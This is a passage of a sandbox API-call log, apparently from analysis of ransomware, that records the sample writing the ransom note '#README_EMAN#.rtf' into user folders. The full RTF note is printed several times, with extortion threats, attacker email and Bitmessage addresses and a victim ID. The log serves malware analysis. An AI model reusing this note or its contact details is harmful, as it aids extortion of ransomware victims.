\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.213] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.213] CloseHandle (hObject=0x2ec) returned 1 [0291.213] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0291.214] GetLastError () returned 0x2 [0291.214] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.214] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.214] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.214] 